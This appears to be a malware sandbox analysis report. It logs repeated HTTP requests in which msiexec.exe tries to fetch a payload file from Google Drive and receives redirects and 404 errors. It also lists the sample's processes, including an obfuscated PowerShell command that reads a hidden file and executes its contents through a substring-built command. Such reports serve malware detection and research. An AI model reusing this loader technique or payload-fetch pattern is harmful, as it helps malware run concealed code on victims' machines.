                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                49192.168.2.1150030142.250.185.1614437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:56 UTC459OUTGET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:57 UTC1851INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgSxo-tuBjQGeatkXoG_ObH5X0NOx8HtL23YRv_K-ekRHhMEHU2X9TkuZUrkyiWUveMCFqirW2s
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:57 GMT
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-CXEIceGuWbSU5M0h8jXe0g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-11 03:27:57 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 75 52 32 31 78 7a 55 4c 30 30 47 74 39 4f 53 49 7a 50 67 74 41 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="uR21xzUL00Gt9OSIzPgtAQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                50192.168.2.1150031142.250.184.2384437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:58 UTC417OUTGET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:58 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:58 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-VPnp8_E9QK63X_UF6l10Vw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                51192.168.2.1150032142.250.185.1614437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:59 UTC459OUTGET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:59 UTC1844INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgQUqSEqw1JzMQWdJetYHYsuuA5QjEHsQIFViLdOidjbSAAHZj_rMSnkiZNcRxqEHnOy
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:59 GMT
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-mHHlDYj-fx5H8huoT0kjpA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-11 03:27:59 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 61 74 70 72 7a 38 64 5a 32 65 37 71 67 62 51 72 74 4c 62 69 71 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="atprz8dZ2e7qgbQrtLbiqw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                52192.168.2.1150033142.250.184.2384437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:28:00 UTC417OUTGET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:28:00 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:28:00 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-o93ua-_OwGeY-6OVrOeqBA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                53192.168.2.1150034142.250.185.1614437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:28:01 UTC459OUTGET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:28:01 UTC1844INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgQtP_AYJThkUi3_ykgVEaAQz7AKCRpKVGt6Auzw5YvL-Mhx0DQOHov5P9kvHxRN-qSR
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:28:01 GMT
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-oe2mNaTjgDuKNzqZHWD6hQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-11 03:28:01 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 56 77 2d 74 38 33 30 70 6d 73 64 66 31 4a 41 34 56 4c 6d 7a 62 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Vw-t830pmsdf1JA4VLmzbw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                54192.168.2.1150035142.250.184.2384437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:28:02 UTC417OUTGET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:28:03 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:28:03 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: script-src 'nonce-2JwwJCKiZyy9oPhDtG99cQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                55192.168.2.1150036142.250.185.1614437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:28:04 UTC459OUTGET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:28:04 UTC1844INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFiumC61xJMYbWgkzkdXb05ToueUhVmXGKXTx1wW1Sk756TpbwluwyybH7wCoGzx_qSErBKQ
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:28:04 GMT
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-KE4JNOS-28Af3EeUz6cQzA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-11 03:28:04 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4c 41 6d 30 38 53 6e 39 38 51 4d 68 51 70 74 51 77 31 6d 32 32 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="LAm08Sn98QMhQptQw1m22g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Click to jump to process

                                                                Click to jump to process

                                                                Click to dive into process behavior distribution

                                                                Click to jump to process

                                                                Target ID:0
                                                                Start time:22:25:59
                                                                Start date:10/01/2025
                                                                Path:C:\Users\user\Desktop\yMXFgPOdf2.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\yMXFgPOdf2.exe"
                                                                Imagebase:0x400000
                                                                File size:554'816 bytes
                                                                MD5 hash:54327A2F6C75BB2C549A5A98A462A588
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:2
                                                                Start time:22:26:00
                                                                Start date:10/01/2025
                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"powershell.exe" -windowstyle minimized "$overstemme=Get-Content -Raw 'C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Touchlvr.Pap';$Epicerebral=$overstemme.SubString(72415,3);.$Epicerebral($overstemme)"
